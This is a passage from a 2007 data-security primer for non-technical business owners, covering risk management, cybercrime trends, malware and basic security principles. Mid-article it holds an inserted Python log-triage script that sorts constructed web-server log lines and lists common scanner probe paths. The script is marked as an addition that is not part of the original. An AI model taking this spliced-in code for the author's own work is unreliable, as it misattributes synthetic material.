
Data Security For the Business Owner

How and Why for non-IT Professionals

Eric Vought <evought@pobox.com>


$Id: BusinessDataSecurity.dbxml,v 1.67 2007/05/19 00:06:11 evought Exp $
Copyright © 2007 Eric Vought

Legal Notice
Some of the designations used by manufacturers and sellers to distinguish their products are
claimed as trademarks. Where those designations appear in this text, and I was aware of the
trademark claim, the designation is appropriately marked on first appearance. Unless otherwise
noted, references to specific tools and applications in this article are presented only as examples of
what is available and not as endorsements. The reader is encouraged to read reviews and research
additional alternatives for his or her self.

I am not a lawyer and nothing in this document is to be construed as offering qualified legal
advice.

All Rights Reserved. This document may not be reproduced in whole or in part, in any form
(beyond that copying permitted by Sections 107 and 108 of the U.S. Copyright Law), without
written permission of the author. Copyright and permission of accompanying graphics and
stylesheets as noted in those files.

Abstract
This document is a data security primer for non-technical business owners, including explanations
of risk management, basic security concepts, and development of a sound security strategy.

Table of Contents
Preface ............................................................................................................................. 2
Goals ........................................................................................................................ 2
Audience ................................................................................................................... 3
Approach .................................................................................................................. 3
"Real World" Risks ............................................................................................................ 3
Building Safety .......................................................................................................... 3
Keeping People Out .................................................................................................... 4
Screening and Trust .................................................................................................... 4
Insurance Policies Mitigate Loss ................................................................................... 5
Data Security Is Also Risk Based .................................................................................. 5
Cybercrime and the State of the Internet ................................................................................. 6
The Internet Is Not Magic ............................................................................................ 6
The Goals of Internet Criminals .................................................................................... 6
Common Cybercrime .................................................................................................. 7
Things Are Not Hopeless ........................................................................................... 10
First Principles ................................................................................................................. 11
Secure the Perimeter .................................................................................................. 11
Guard Your Secrets ................................................................................................... 12
Create a Defense In Depth ......................................................................................... 12
Security By Obscurity Is Not Effective ......................................................................... 13

1
Business Data Security

Exploits and Vulnerabilities ........................................................................................ 13


Keep Your Eyes Open ............................................................................................... 14
Building a Data Security Strategy ........................................................................................ 14
First Steps ............................................................................................................... 14
Your IT Professionals ................................................................................................ 16
Document Retention and Protection ............................................................................. 18
Documentation, Policies, Audits— How Much, How Often .............................................. 18
An Incident Response Plan ......................................................................................... 22
Making IT and Security Purchases ............................................................................... 27
Your Network Layout ........................................................................................................ 32
The Network Perimeter .............................................................................................. 36
Employee PCs - The IT Battleground ........................................................................... 39
Network Services - Sharing and Editing Files ................................................................ 46
Internet Services and Communication ........................................................................... 50
Conclusions ..................................................................................................................... 50
Frustrations .............................................................................................................. 50
Glossary .......................................................................................................................... 51
Bibliography .................................................................................................................... 63

Preface
Goals
Data security, the protection of business information and associated computer networks, is a highly
technical field which is often associated with black magic by non-technical professionals. This situation
is not helped by a communications gap between IT professionals and business owners. Business owners
are not trained to understand the technical concepts and computer professionals cannot explain risks in
concrete business terms.

Uninformed business owners cannot avoid dangers and capitalize on opportunities in a rapidly changing
technical landscape. Frequently, critical issues are ignored and money is spent on ineffective solutions.
This document:

• explains security in terms of risk-management,

• reports on the current state of the Internet,

• describes fundamental security concepts in concrete, non-technical terms,

• develops basic data security strategies from first principles,

• presents example business cases where security versus opportunity trade-offs are made,

• and concludes by encouraging a "security mindset" where technology concerns are incorporated into
day-to-day business decisions.

This document will not turn the reader into an IT professional, much less a security professional. What it
can do, however, is better equip you to evaluate how data security affects your business and communicate
with technical professionals and vendors you hire to secure your data. It will also, hopefully, help you to
recognize the snake-oil salesmen who offer ineffective solutions to problems you may not even have.

Some parts of this document, those describing current electronic threats to your business, may seem
alarmist. These reports should alarm you: the current state of Internet security is very poor and some
authorities would say desperate. Most people are unaware of the ways in which systems are routinely
compromised. Vendors have a vested interest in keeping these facts quiet or no one would use their
products or services. Fortunately, however, prudence and care can eliminate the most common threats and
make trouble even for sophisticated attackers. The biggest threat on the Internet is ignorance and the fact
that most computer users do not take even basic precautions. Safely navigating large cities requires street-
sense and awareness; the Internet is no different. As our world changes, businesses that become street-
smart will have a competitive advantage over those that do not.

Although I provide links to examples of products or technologies, I steer clear of providing steps to
accomplish tasks, use products, or secure particular types of systems (such as tightening down a Windows
XP™ computer or using encryption in Microsoft Outlook™). Technology changes rapidly and my goal
here is to teach concepts that are independent of particular products. Specific technical solutions are best
handled by IT staff for larger businesses or technology specific howtos for SOHO professionals.

Audience
This article is targeted at small to medium-sized business owners. Much material applies to Small Office/
Home Office (SOHO) users, particularly background information, basic security strategies, and much of
the discussion on desktop and communications security. SOHO readers who are not connected with or do
not work within a larger organization will find that discussions of policy, management, and organization,
as well as network architecture and services will not directly apply to them and will likely skip or skim
those sections. Owners or managers of larger businesses will find that discussions of security plans here
are necessarily simplified. Medium to large organizations have complex and varied networks with legacy
technologies and layers of existing policy which cannot be treated in one document. In these cases, the
glossary and bibliography will help you to find other sources of information. Given the concepts presented
here and the help of competent specialists, it is hoped that a manager can learn what they need to know
about their own system to manage it effectively.

Approach
The information presented here is extensive— do not try to absorb it all at once and do not expect to change
your business overnight. Take it in steps. I recommend reading through once at a high level to absorb
the contents and skim the detail. Then start through again. I have worked to provide extensive references,
links, and a glossary. Focus on the parts that are most important to your business, explore the references
and talk to your IT people. If you find that your IT staff or consultants will not work with you, get new
ones. Try to learn and improve something each week. The end goal is to turn the Internet from an unknown
source of risk to something which can be understood and capitalized on.

"Real World" Risks


Tip
The goal of security is not to combat risk for its own sake, but to maximize business opportunity.

Outside of cyberspace, your business must balance risks in order to remain profitable. When you see
business opportunities, you identify risks, determine how likely they are, how much damage they may
cause, what may be done to lower or avoid the risks, and, ultimately, whether the opportunities are
worthwhile. Sometimes outside experts, such as lawyers, market experts, or insurance agents, are consulted
to assess the risks or suggest ways to protect the business. Sometimes the business must change the way it
operates to avoid liability or comply with regulations. In any case, the overriding goal is never to combat
risk for its own sake but rather to maximize opportunity and create a successful business.

Building Safety
Buildings are required to have basic safety features such as lighted exit signs. In some locations it is
forbidden to use a corded vacuum cleaner during business hours in an area with pedestrian traffic. In other
locations, this is left to the discretion of the business owner. The business owner must balance the likelihood
of a pedestrian being injured by tripping against the need to run the vacuum. Given the high damage awards
for personal injury lawsuits and the low cost of push-powered carpet sweepers, this is probably an easy
choice. The cost of installing a backup lighting system in a small office occupied only during the day is
not so easily justified.

Tip
Good risk management focuses on effective solutions to tangible problems.

I was recently startled by the presence of a sprinkler system in a hotel common room. The room was made
entirely of brick and concrete and its only contents were a large swimming pool. The cost of safety systems
must be balanced by risk analysis. The sprinklers were an ineffective solution to a non-existent problem.

Keeping People Out


Your business most likely has to deal with a variety of physical security issues. You must lock your
business to protect its own property, such as its equipment, product inventories, any cash or deposits,
financial instruments such as checkbooks and stock certificates, records, etc, from theft or vandalism. You
may also have to protect property which belongs to third parties, such as rented furniture or equipment
or items held on consignment. In all likelihood the entire building is rented and your business might be
liable for any damage.

In one of the great injustices of our legal system, a business is sometimes held liable when a trespasser
injures themselves on business property. It is possible that a business property may be used by a third
party for illegal acts such as storing contraband in an otherwise legitimate warehouse. I have seen many
instances of teenagers consuming drugs and alcohol on unsecured construction sites. A business may have
to spend significant effort to install locks, fences, and cameras to keep people out. Sometimes the mere
presence of a lock and a "No Trespassing" sign is enough to reduce the potential liability.

Tip
Sometimes the greatest risk of an incident of any kind is loss of customer or investor confidence,
even when direct financial damage is minimal [Lemos-2007a].

Like building safety, the expense of physical security must be balanced by the risks and potential cost of a
break-in. It makes no sense to spend $10,000 on a safe to contain $2,000 in valuables. On the other hand,
all potential costs must be weighed. Even if the monetary value of stolen equipment is low or it is well
insured, how much business will be lost before it can be replaced? Will a break-in and business delay raise
insurance rates and lower customer confidence?

Screening and Trust


Parts of your business are more sensitive than others. You would not ask the same people to negotiate
with clients or give you legal advice that you hire to answer the phones. This is both a question of trust
and of competence. Your legal counsel is trained and licensed to practice law. You probably went through
some screening or interview process to select a lawyer that you were comfortable with, even if that was
only flipping through the yellow pages and talking to some of them on the phone. As you develop your
business relationship, you may trust them to perform tasks with less intervention.

Only certain employees have access to your financial information, including your bank balance, the ability
to write checks, business credit accounts and so forth. These employees have a background, such as a
CPA license or business course, which makes them appropriate choices for their assigned tasks. If you
are prudent, you check on their work regularly, going over accounts and reports, checking invoices and
balances and, generally making sure that you are not being taken advantage of. When employees leave, you
must ensure that important records and items stay behind and that they no longer have access to accounts
they worked with during their employment.

Tip
You should be aware of who has access to your electronic information, what their disclosure
policies are, and how it might affect your business.

If you deal with sensitive information, you may have to perform background checks on applicants. This
may include drug screening, records checks, and checking references. Employees who have gone through
this screening will have access to parts of your business that others do not.

Insurance Policies Mitigate Loss


Tip
Are your information assets insured? What happens if your records are destroyed?

Your business most likely has a number of insurance policies, including general liability, equipment
protection, fire, key man and so forth. While building safety and physical security attempt to prevent loss
from occurring, insurance reduces loss after the fact. The desired balance between prevention and cure
is often unclear, but the common element is that both are based on an estimate of risk and probable loss.
Insurance premiums and policy coverages are based on statistical estimates of the likelihood of loss and the
amount of that loss. Insurance companies wager that the amount that they will gain from your premiums
will earn more than they will pay you in the event of a claim. In return, you gain the peace of mind in
knowing that a disaster will not financially ruin your business.

Data Security Is Also Risk Based


Data security is no different from any other business risk assessment. What do you have to lose? What
will it cost to protect your systems? Where is the best return on investment?

Tip
The precautions a business has taken will often be judged with hindsight, possibly by a jury, after
an incident has occurred.

When data confidentiality agreements or federal regulations like HIPAA require you to take "reasonable
precautions" they are telling you that you will be judged after the fact, by a jury. When an incident actually
occurs, your policies will be examined under a microscope through the lens of hindsight. Your job, then,
is to balance the probability and cost of a lawsuit against the cost of your security.

You can never be certain your systems are secure, just like you can never be certain your business will not
suffer a fire or an on-the-job injury. At some point, you decide what is reasonable, roll the dice, and take
your chances. As with any other business risk, you need to find a balance between preventing loss and
mitigating loss after the fact. Security systems such as passwords and firewalls prevent loss. Some types
of insurance mitigate digital losses: some policies provide "data loss" protection, your liability insurance
might provide protection against breach-of-security suits, etc. Backup and data recovery systems also help
to mitigate loss after the fact.

Cybercrime and the State of the Internet


The Internet Is Not Magic
Tip
The Internet does not change the laws of economics or fundamental business practices.

Although the Internet is often touted as "changing all the rules," a more critical look shows that this
is seldom the case. Businesses, whether they use the Internet or not, must still market their services to
customers, must still make reasonable margins, deliver real or perceived value, and compete successfully
against other businesses trying to do the same thing. Similarly, crime on the Internet is generally an
extension of real world crime or is readily analogous to real world crime.

It was the erroneous belief that the Internet was fundamentally different, that it changed the rules of
business, which led to the dot-com bust. Very shaky ventures attracted enormous investments based on
the idea that the magic of the Internet would make them profitable. This did not happen.

What the Internet does do is change the parameters of time and space. OK, back up; what does that mean?

• The Internet is globally connected. Many more people, potential customers and potential criminals,
now have access to your business. Similarly, global competitors now have access to your traditional
customer base.

• The Internet is always open for business. Customers are not accustomed to having online businesses
close shop at dark and roll down an iron grate. This means that your Internet facing applications are
accessible and open to attack at all hours.

• Suddenly everything is smaller: a one hundred page proposal with exhibits can be sent to a client in
seconds and will fit on a single thumb-sized USB drive. On the other hand, someone can walk out with
your entire customer contact list the same way.

• Things happen faster on the Internet. You can sell CDs to ten customers on the Internet faster than you
can process one customer at your cash register. You can submit insurance claim forms in seconds instead
of days. You can get responses from regulatory agencies by email in the course of a single business day
instead of a week by mail. On the other hand, several thousand people can attempt to break into your
online store in the course of a single night.

• Because anyone can access anything from anywhere, it can be very difficult to determine who actually
did so at a specific time. Tracking criminals and sorting legitimate purchases from fraudulent ones can
be difficult, especially when the criminals are clever.

The Goals of Internet Criminals


The motives of criminals on the Internet are no different from any other criminals:

• Simple theft. Make a fraudulent purchase and get away with it.

• Steal sensitive data to make theft easier. Real thieves steal credit cards, raid mail boxes, and print fake
IDs. Internet thieves steal or forge the electronic equivalents.

• Espionage: government, corporate, or personal. Governments spy on each other, businesses want to get
hold of each others' client lists, research, and proposals, people want to spy on their rivals. Internet
espionage is easier than going through dumpsters, but has the same goals.

• Revenge. Disgruntled employees may keep a grudge against a business, so can rival businesses, or ex-
spouses. Any of those might have or might be able to obtain the information necessary to do damage.

• Embezzlement, insider trading, or other stock fraud.

• Thrill. Just like spray-painting the side of a bridge, someone may damage your website just for pleasure.
There is an underground of young hackers who think it is cool to break into companies and brag about it.

• Cover their tracks. Just like hiding contraband in someone else's warehouse, a criminal may use your
legitimate business as a base of operations for some other illegal scheme. The criminal could be one of
your own employees downloading illegal files or attacking another system.

Common Cybercrime
So, how common is crime on the Internet and what form does it take?

Crime Statistics
According to the 2006 FBI Internet Crime Report [FbiIc3-2006] the FBI Internet Crime Complaint Center
processed 200,481 Internet-related crime complaints, a number which is down somewhat from 2005 but
more than double 2003 figures. Complaints supported 86,279 criminal investigations at the federal, state,
or local level. The complaints were varied, including auction fraud, non-delivery of goods, credit card
fraud, computer intrusions, SPAM, and child pornography. Almost all involved financial loss, with a total
loss of $198.4 million (up slightly from last year).

The FBI and Computer Security Institute perform a yearly survey of computer security professionals in US
organizations (companies, government agencies, medical institutions, etc.). The 2006 Computer Crime and
Security Survey [GordonEtAl-2006] polled 616 such professionals on the number and type of incidents
experienced, security budgets, protections in place, and so forth for 2005. Among its findings is that the
top four threats, viruses, unauthorized computer use, theft of equipment, and theft of intellectual property
(in order) account for 74% of losses. Fifty-two percent of respondents reported unauthorized use of their
systems in the twelve month period and 9% reported more than 10 such incidents. Total losses from the
313 respondents willing to provide figures were estimated at over $52 million. A disturbing trend is the
number of respondents who claimed substantial loss from insiders.

Reported financial damages and number of successful attacks have noticeably decreased against previous
years, but the survey is skewed toward companies with security policies in place (they have dedicated
security personnel and have been in contact with CSI) who have presumably been improving their defenses.
This offsets bad news in other quarters and demonstrates that companies can make progress given time.
Interestingly, 22% of those surveyed were in organizations with from 1-99 employees, so small to medium
businesses were well covered. The survey notes that per employee expenditures on security are much
higher in smaller organizations (by total revenue), something we will talk about with respect to regulation
compliance later on.

Identity Theft
Identity theft and credit card fraud are currently handled and reported by a variety of agencies and reported
statistics are not normally separated according to online and offline categories. What is clear, however,
is that theft or misuse of credit card numbers and fraudulent applications for credit cards is rapidly rising
and wholesale theft of private data fuels the crisis.

Perhaps the largest such data theft involved TJX, the owner of TJ Max™ and other stores, and the loss
of 45.6 million credit card numbers [Vijayan-2007a]. Several break-ins occurred starting in July 2005 but
were not noticed for over a year. It has become common to see vendors expose tens of thousands of private
customer records including names, addresses, social security numbers, and financial information due to
security breaches. This creates vulnerabilities for online merchants who may be liable to charge-backs and
fees from fraudulently made purchases. It also exposes business cardholders whose accounts may have
high limits and high purchase volumes where fraudulent use may escape immediate attention. Vendors
who lose data in this manner may be the target of lawsuits and may lose their merchant status.

Tip
Governments do not hold a monopoly on espionage.

A related topic is of stalking, spying, and espionage. When people think of spies, they immediately think
of secret government agents, but the truth is that businesses and private individuals spy on each other all
of the time. Getting hold of a competitor's proposals, trade secrets, client contacts, or price lists can yield
a tremendous market advantage and many businesses are not above bending or breaking the law in order
to do so. In my time as a defense industry contractor, the threat of competitors stealing proprietary data
was only slightly less than that of foreign governments.

Private individuals may attempt to steal or leak proprietary data in order to affect or guess changes in
stock prices. Insider trading is a constant subject of SEC investigations and although it is not new to the
electronic world, data networks certainly open up new opportunities for exploitation.

Pretexting, made famous by the recent Hewlett Packard Board of Directors scandal [Krazit-2006], is the
practice of impersonating a person or entity in order to obtain more information about them. The actual
impersonation is often done over the phone, but the initial investigation is generally performed using the
Internet. Enough information can be gathered on the Internet to successfully impersonate the target over
the phone, to say, the phone company, or a bank, and then copies of personal records can be obtained.
Internet investigation companies sell services using pretexting to individuals wishing to investigate a
rival or competitor. This information can then be used for a variety of illegal purposes. In many areas,
law enforcement is hard pressed to identify specific laws that pretexters violate, although lawmakers
are working to draft specific bills. It is not clear whether companies may be held liable for giving out
information to pretexters or for using insufficient verification of customer identity.

Silent Crimes
The FBI report only counts reported Internet crime. Many businesses and computer users may suffer from
security compromises and not be aware of the damage. In the past, viruses and malware would damage or
destroy target systems leaving obvious signs of their presence. Today, a virus or intruder is just as likely
to quietly copy data and leave a back door open so they can return at will. Attackers install key loggers
which track the computer's use and look for sensitive information like passwords and account numbers.

Tip
An attacker may visit your system repeatedly and use your computer for illegal acts without
leaving any sign of their presence.

Many PCs are turned into so-called zombies which are remotely controlled to perform a number of
illegal tasks, including sending commercial SPAM, engaging in bank fraud (phishing schemes), Denial-
of-Service (DoS) attacks against security companies, government agencies, and public infrastructure, and
attempting to break into new systems. A company called CipherTrust [1] tracks approximately 250,000 new
zombies each day. Security company Symantec reports that more than six million computers are now under
remote control [Bbc-2007a], although some experts put the number much higher, perhaps as much as one
quarter of Internet connected systems [Weber-2007].
[1] http://www.ciphertrust.com/

Corporate networks are not immune to the zombie threat. Even fortune 500 companies have been
embarrassed by SPAM-spewing zombies on their networks, sometimes brought in by contractor-owned
laptops [Krebs-2007].

A worrying development is the creation of web sites by crime syndicates selling sophisticated toolsets,
including technical support, and subscriptions for upgrades. These toolkits allow the purchaser to set up
malware on their own or someone else's website to infect visitors; they then get paid for information
collected from the victims [Vijayan-2007b]. Because of this, malware silently delivered by websites is
rising sharply and is increasingly being delivered by legitimate business or government web sites which
have been hacked themselves [Bbc-2007b].

SPAM
SPAM, or unsolicited bulk messages, is now a significant chunk of all Internet traffic. A compilation
of statistics from 2006 by Don Evett puts SPAM at 40% of all emails, or 12.4 billion messages per day
[Evett-2007]. This figure is rising exponentially and is beginning to place significant stress on the capacity
of Internet infrastructure. SPAM today is mostly sent from PCs that have become zombies. Most SPAM
advertises pornography, illegal business scams, stock fraud, fake products, phishing schemes, or other
items of a questionable nature. Nevertheless, many computer users respond to such emails and even attempt
to make purchases, visit sites, or participate in illegal ventures.

Tip
SPAM continues to be sent because it works: enough users participate in the schemes it advertises
to make sending the SPAM worthwhile.

SPAM causes a number of problems to a business, not the least of which is simply the time lost to sorting
through junk. Personally, I receive over ten SPAM messages for each legitimate email and use a variety
of filters to prevent it from reaching my mailbox. SPAM messages which may contain bulky images slow
down networks, increase time spent downloading messages, and increase network mail storage. Aside
from the mere nuisance, however, SPAM is actively dangerous: it can deliver viruses, tempt employees to
open dangerous attachments, expose financial information, visit sites which will attack their computer, or
participate in illegal activities. Another business aspect of SPAM is the marketing side; extreme care must
be taken when using email as a marketing tool to avoid antagonizing customers already sick of SPAM
or landing the company mail server on a SPAM blacklist.

(emv 20070424) I'd like to find a reference here about an accidentally RBL'ed company.

Malware
Caution
Beware virus warnings! It is not uncommon to receive emails reporting a new virus threat that is
not detected by virus scanners which request that you take action, such as deleting files on your
hard drive or installing attached patches. In many cases, following these instructions will damage
your system or compromise your security. I have received many calls from clients, relatives, or
friends asking me what to do afterwards, and usually “Reinstall your system.” is the only answer.
Recently, a large virus outbreak was fueled by just such an email [Keizer-2007]. Always check
with a trusted security professional or with the website of your security vendor before acting on
any security warning and do not forward the email to others. Never follow links provided in the
email to security sites; always type them in yourself or use your own bookmarks.

Malware: spyware, viruses, trojan horses, and so forth, is a common and growing problem. Part of this
stems from the desire of many computer users to try dozens of new tools and games on their (or their
employer's) computer. Part of it stems from deep-seated flaws in the Windows operating system which
make it easy for malware hiding in these programs to take control of the computer. Part stems from
unscrupulous vendors who include malware in their products in attempts to collect marketing data, prevent
users from running competing products, display advertisements to users or direct them to advertisements
on the web.

Sometimes these products are not explicitly designed to cause harm, but they contain bugs which damage
infected computers or open up security vulnerabilities which are exploited by other attackers. Sony, for
instance, included a root-kit on a large number of music CDs which silently installed itself on a PC used to
play the music. The root-kit was intended to prevent the user from copying the songs and report information
about the user's listening habits to Sony but opened up security holes which others could use to break into
affected computers [Kantor-2005]. The fix released by Sony opened up more security holes and resulted
in an outbreak of viruses tailored to PCs that had been used to play Sony music. Equally disturbing is the
fact that security companies, who considered Sony a “legitimate” vendor, were slow to react and slower
still to add the Sony root-kit to their malware detectors [Schneier-2005].

Not-me Syndrome
Many businesses believe that they are not at risk because they do not have anything in their network to
interest an attacker. This is a dangerous myth.

Tip
Your business may not be of direct value to an attacker, but it may be a stepping stone to other
illegal acts. Collateral damage is a problem.

I was once called in to a real estate appraisals business because their mail server suddenly went down.
They had recently lost their system administrator and had not yet obtained a new one. Upon investigation,
I determined that their server had not merely failed but had been deliberately destroyed. Suspicion
immediately fell on the previous system administrator, but I was eventually contacted by CERT [2], the
Computer Emergency Response Team, with information that the mail server had been used to attack a
government system. The attacker had broken into this business' server, used it to attack another site, then
destroyed the server and its logs in order to cover their tracks.

The attacker had entered through a vulnerability in out-of-date mail server software. Due to the destruction
of the logs, we were never able to determine where the attacker came from. The attack cost the
business downtime, IT service costs, and expensive security upgrades to prevent a recurrence. Perhaps as
importantly, the breach allowed someone to successfully attack a government system and get away with it.

In recent years, I was responsible for the maintenance of a number of server systems running web sites,
email, and other services for small businesses. The servers would record thousands of attempted attacks
per day. Most of the attacks attempted to exploit weaknesses in software we were not running, and I used
tools to filter the logs down to the dozen or so attacks per day which I would examine and file reports on.
A sizable portion of these attacks were from East Asian countries and I would seldom receive responses
to my reports. The responses I received from US and European network administrators, large and small
companies, generally stated that their security had been breached, often by operators from East Asia,
and their systems had then been used to attack dozens of others, including those under my care. The US
Department of Defense has reported incessant attempts by attackers from certain Asian countries to breach
military security, possibly with foreign government support, and unwary businesses may often be used as
springboards in those efforts.

(emv 20070424) Can probably find a reference here on the DoD issues.
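The log triage described above, as an added illustration that is not part of the original article: constructed web-server log lines are sorted into noise (probes for software this hypothetical server does not run), requests worth a human look (errors from software it does run), and ordinary traffic, with a per-source count of the requests to examine. The hosted and unhosted path prefixes, the addresses, and the log lines are all assumptions.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Constructed sample access-log lines in Common Log Format. The addresses come
# from the RFC 5737 documentation ranges and the traffic is invented, not captured.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Apr/2007:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 1043
203.0.113.5 - - [24/Apr/2007:10:01:13 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210
203.0.113.5 - - [24/Apr/2007:10:01:14 +0000] "GET /mysql/admin/ HTTP/1.1" 404 210
198.51.100.9 - - [24/Apr/2007:10:02:01 +0000] "GET /cgi-bin/formmail.pl HTTP/1.0" 404 210
198.51.100.9 - - [24/Apr/2007:10:02:02 +0000] "GET /wp-login.php HTTP/1.1" 404 210
192.0.2.77 - - [24/Apr/2007:10:03:40 +0000] "GET /webmail/ HTTP/1.1" 200 5123
192.0.2.77 - - [24/Apr/2007:10:03:41 +0000] "GET /webmail/admin/ HTTP/1.1" 403 0
192.0.2.77 - - [24/Apr/2007:10:03:42 +0000] "POST /webmail/login HTTP/1.1" 500 0
192.0.2.77 - - [24/Apr/2007:10:03:43 +0000] "GET /shop/cart HTTP/1.1" 200 2048
"""

# Assumed inventory of this hypothetical server: the web applications it runs,
# and the path prefixes scanners commonly probe for software it does NOT run.
HOSTED_PREFIXES = ("/webmail/", "/shop/")
UNHOSTED_PREFIXES = ("/phpmyadmin", "/mysql", "/cgi-bin/", "/wp-")

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \d+')

Record = Tuple[str, str, str, int]  # (client address, method, path, status)


def parse_line(line: str) -> Optional[Record]:
    """Pull the client address, method, path and status out of one log line."""
    m = LOG_RE.match(line)
    if m is None:
        return None  # malformed or truncated line: skip rather than guess
    ip, method, path, status = m.groups()
    return ip, method, path, int(status)


def classify(path: str, status: int) -> str:
    """Sort one request into 'noise', 'examine' or 'normal'.

    A probe for software we do not run cannot succeed here, so it is only
    counted. An error from software we do run is what deserves a human look.
    """
    if path.startswith(UNHOSTED_PREFIXES):
        return "noise"
    if path.startswith(HOSTED_PREFIXES):
        return "examine" if status >= 400 else "normal"
    # Plain static content: an error here is a stray probe, anything else is ordinary.
    return "noise" if status >= 400 else "normal"


def triage(log_text: str) -> Dict[str, object]:
    """Reduce a day's log to the handful of requests worth reporting on."""
    noise: Counter = Counter()    # unhosted prefix -> number of probes seen
    sources: Counter = Counter()  # client address -> requests worth examining
    examine: List[Record] = []
    normal = 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, _method, path, status = rec
        kind = classify(path, status)
        if kind == "noise":
            prefix = next((p for p in UNHOSTED_PREFIXES if path.startswith(p)), "other")
            noise[prefix] += 1
        elif kind == "examine":
            examine.append(rec)
            sources[ip] += 1
        else:
            normal += 1
    return {"noise": dict(noise), "examine": examine,
            "sources": dict(sources), "normal": normal}


def report(summary: Dict[str, object]) -> str:
    """Render the triage summary as the short daily note an administrator would file."""
    lines = [f"ordinary requests: {summary['normal']}"]
    for prefix, n in sorted(summary["noise"].items()):
        lines.append(f"ignored {n} probe(s) for unhosted {prefix}")
    for ip, method, path, status in summary["examine"]:
        lines.append(f"EXAMINE {ip} {method} {path} -> {status}")
    for ip, n in sorted(summary["sources"].items()):
        lines.append(f"source {ip}: {n} request(s) to examine")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(triage(SAMPLE_LOG)))
```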

Things Are Not Hopeless

This all may seem very depressing, and indeed it should. A survey of "real world" criminal activity, such
as the increase of shoplifting or convenience store robberies, may seem depressing as well, however, and
businesses did survive and flourish before the advent of computers. Many businesses protect themselves
against traditional criminal activities as a matter of standard practice; banks, for instance, have done
business through small slots for decades and indeed a Chinese payroll clerk invented this defense thousands
of years ago. Businesses can and will develop standard defenses against Internet crime and those which
do will enjoy a competitive advantage against those which fail to adjust.

[2] http://www.cert.org/

Tip
You don't need to outrun the bear, you just need to outrun your friend.

It is not necessary and indeed not possible to protect your business from all attackers. It is only necessary
to make your business a difficult enough target that criminals will look for easier marks. The success of
The Club™ [3], an auto theft deterrent which locks a car steering wheel, is not that it prevents theft. Indeed,
there are several known techniques to bypass them. Many thieves are lazy by nature and do not want to
expose themselves to detection longer than necessary. If two cars are sitting next to each other and only
one of them is protected, the unprotected car will be stolen every time.

Of necessity this leads to an arms race and security is not a matter which can be solved once and forgotten.
By applying basic principles, however, and incorporating them into business planning, your enterprise will
automatically adjust to new and developing threats.

First Principles
In this section, we will discuss basic security principles. These principles apply to many situations outside
of data security, including physical security, warfare, biological defense against infection and so forth. Data
security is complex and requires significant training, but it is not magic. By understanding basic security
principles you can better communicate with professionals you hire to help you, better evaluate the claims
of vendors, balance business risks and opportunities, and use safer practices in your daily work. We will
approach these concepts with real-world, physical examples, and then demonstrate computer equivalents
in later sections.

Secure the Perimeter

You probably have valuable items in your house. At the very least, you will have electronic equipment like
an entertainment center, important documents, perhaps expensive jewelry. These items would interest a
thief. When you go out, you probably lock your door. Locking the door secures the perimeter of your house
and makes it difficult for the thief to enter. Even if a thief gets past the lock, it has increased the time they
spend getting into your home, increased their likelihood of getting caught, and raised the penalties they
would receive (Breaking and Entering). In some locales, the mere presence of a lock or security device
doubles applicable fines and sentences for theft or vandalism.

Tip
Perimeter security is only as good as its weakest point.

The lock on the door may not be effective if other parts of the perimeter, the outside of your house, are not
secure. If your garage door is unlocked, you have unlocked ground floor windows, perhaps a basement
door, etc., the expensive deadbolt on your front door is useless.

The Manhattan Project physicist Richard Feynman worked at Los Alamos during World War II. The Los
Alamos National Laboratory was a Top Secret facility with access controlled by armed guards. One day,
Feynman discovered that there was a hole in the outside fence. People were using the hole to get back and
forth to town without going through the security checkpoint. Feynman reported the hole but was ignored.
He then walked out of the hole and back in through the checkpoint. He repeated this several times before
the guard grew suspicious and noticed that Feynman kept going in but never came out. Finally, the hole
was fixed [FeynmanEtAl-1985].

It is tempting to ignore holes in your perimeter security, but by the time someone acts responsibly and
reports them to you, you can bet that other people of less character have noticed as well.

[3] http://www.amazon.com/Original-Club-1000-Anti-Theft-Device/dp/B0000CBILL

Guard Your Secrets

If you lock your door and leave the key on the top of the frame or under the mat, your lock will not be
effective. Likewise, if you give copies of your key out to unreliable or unscrupulous individuals or do not
change the lock when you move in, you can no longer limit access to your home.

Tip
Locks, no matter how sophisticated, are only as effective as the secrets which protect them.

Your key is a secret which is supposed to be known only to you and tells the lock that you are authorized
to enter. The same principle applies to combination locks. If you never change the combination from the
manufacturer's setting or use a number (such as birth date or anniversary) that someone else can readily
look up or guess, the lock will not protect your valuables.

Create a Defense In Depth

If the armed guard had been the only security feature at Los Alamos, the hole in the outer fence would
have compromised the entire facility and the entire Manhattan Project. Of course, the fence was not the
only obstacle a potential spy had to deal with. First of all, the existence of the Manhattan Project and the
purpose of the laboratory was a secret. The buildings and important rooms had locks. The scientists were
sworn to secrecy. Documents were locked in safes. In a small group of people, an intruder, particularly
one without appropriate ID, would be quickly identified. All of these features worked together to protect
the project. This is a defense in depth.

Similarly, at your home you may have a gated fence. You might have a dog or an alarm system. Perhaps
there is a neighborhood watch. Your most valuable possessions might be in a wall safe and perhaps photos,
serial numbers, or appraisals are stored in a bank safety deposit box so that you can provide them to law
enforcement or your insurance agent.

The important thing is that multiple levels of security act together to deter or slow down an intruder. If
one defense fails, other defenses must still be dealt with. Sometimes layers of defense can stop an intruder
and sometimes they only limit damage. Perhaps an intruder who jimmies your lock can steal your DVD
player but not your jewelry.

Tip
Often, several simple or inexpensive layers of security are much more effective than one
complicated or expensive layer.

A simple lock and an inexpensive alarm may be more effective than an expensive lock and no alarm.
The alarm will also protect you when the intruder breaks a window. When planning, beware silver bullet
solutions which claim to solve all of your problems in one go. It only takes one simple mistake elsewhere to
bypass your expensive protection. Simpler solutions have the added benefit of being easier to understand,
easier to verify, and sometimes harder to penetrate. Blocking your door with a heavy iron bar may be crude
but it is simple, cheap, and effective.


Tip
Always put together an overall security plan first. You can go back later and upgrade individual
pieces.

Get the most out of security by making it do double duty. Putting valuables in a safe and storing insurance
documents with your bank will help protect you from fire as well as theft. Getting to know your neighbors
can keep you informed on all kinds of issues. You will find similar ways that data security can be used
to achieve other business goals.

Security By Obscurity Is Not Effective

When you go to a hardware store and buy a deadbolt for your front door, you will probably find that it
meets certain industry standards, such as ANSI/BHMA A156.5-2001 and it is probably UL listed. It is
based on a standard design which has been thoroughly tested. Any thief can look up detailed information,
